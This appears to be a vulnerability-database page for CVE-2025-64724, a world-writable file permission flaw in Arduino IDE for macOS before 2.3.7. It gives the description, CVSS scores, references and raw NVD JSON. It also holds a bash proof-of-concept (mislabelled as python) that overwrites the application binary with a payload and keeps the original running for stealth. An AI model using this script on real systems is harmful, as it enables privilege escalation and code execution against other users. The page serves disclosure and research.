CVE-2025-64724

Description

Arduino IDE is an integrated development environment. Prior to version 2.3.7, Arduino IDE for macOS is installed with world-writable file permissions on sensitive application components, allowing any local user to replace legitimate files with malicious code. When another user launches the application, the malicious code executes with that user's privileges, enabling privilege escalation and unauthorized access to sensitive data. The fix is included starting from the `2.3.7` release.

CVSS Details

CVSS Score

7.3

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:arduino:arduino_ide:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:* - NOT VULNERABLE

Arduino IDE < 2.3.7 (macOS)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/bin/bash
# CVE-2025-64724 PoC - Arduino IDE macOS Privilege Escalation
# This PoC demonstrates the world-writable permission vulnerability

ARDUINO_APP="/Applications/Arduino IDE.app/Contents/MacOS/Arduino IDE"
BACKUP_EXT=".backup"

# Check if Arduino IDE is installed
echo "[*] Checking if Arduino IDE is installed..."
if [ ! -f "$ARDUINO_APP" ]; then
    echo "[-] Arduino IDE not found at $ARDUINO_APP"
    exit 1
fi

# Check current file permissions
echo "[*] Checking file permissions..."
PERMS=$(stat -f "%Sp" "$ARDUINO_APP")
echo "[+] Current permissions: $PERMS"

# Check if file is world-writable
if [ "$(stat -f "%Lp" "$ARDUINO_APP")" -ge 777 ] || [ -w "$ARDUINO_APP" ]; then
    echo "[!] VULNERABLE: File is world-writable!"
    echo "[!] An attacker can replace this file with malicious code"
    
    # Backup original file
    cp "$ARDUINO_APP" "${ARDUINO_APP}${BACKUP_EXT}"
    
    # Create malicious replacement (example: reverse shell)
    cat > "$ARDUINO_APP" << 'EOF'
#!/bin/bash
# Malicious payload - would execute arbitrary code
# In real attack: connect back to attacker controlled server
echo "Malicious code executed with user privileges: $(whoami)" >> /tmp/arduino_exploit.log
# Execute original binary to maintain stealth
exec "${0}.backup" "$@"
EOF
    
    chmod +x "$ARDUINO_APP"
    echo "[+] Malicious file created"
    echo "[+] When any user launches Arduino IDE, the payload will execute"
else
    echo "[+] File is NOT world-writable (patched or secure configuration)"
fi

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-64724
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-64724
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-64724/
[4] VulDB https://vuldb.com/cve/CVE-2025-64724
[5] https://github.com/arduino/arduino-ide/pull/2805/commits/5d282f38496e96dcba02818536c0835bd684ec98
[6] https://github.com/arduino/arduino-ide/releases/tag/2.3.7
[7] https://github.com/arduino/arduino-ide/security/advisories/GHSA-3fvj-pgqw-fgw6
[8] https://support.arduino.cc/hc/en-us/articles/24329484618652-ASEC-25-004-Arduino-IDE-v2-3-7-Resolves-Multiple-Vulnerabilities

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-64724", "sourceIdentifier": "[email protected]", "published": "2025-12-18T16:15:55.623", "lastModified": "2026-02-19T21:23:43.873", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Arduino IDE is an integrated development environment. Prior to version 2.3.7, Arduino IDE for macOS is installed with world-writable file permissions on sensitive application components, allowing any local user to replace legitimate files with malicious code. When another user launches the application, the malicious code executes with that user's privileges, enabling privilege escalation and unauthorized access to sensitive data. The fix is included starting from the `2.3.7` release."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.3, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-276"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:arduino:arduino_ide:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.3.7", "matchCriteriaId": "9B0539DC-9343-439C-94B5-55D9034C3095"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:*", "matchCriteriaId": "387021A0-AF36-463C-A605-32EA7DAC172E"}]}]}], "references": [{"url": "https://github.com/arduino/arduino-ide/pull/2805/commits/5d282f38496e96dcba02818536c0835bd684ec98", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/arduino/arduino-ide/releases/tag/2.3.7", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/arduino/arduino-ide/security/advisories/GHSA-3fvj-pgqw-fgw6", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}, {"url": "https://support.arduino.cc/hc/en-us/articles/24329484618652-ASEC-25-004-Arduino-IDE-v2-3-7-Resolves-Multiple-Vulnerabilities", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}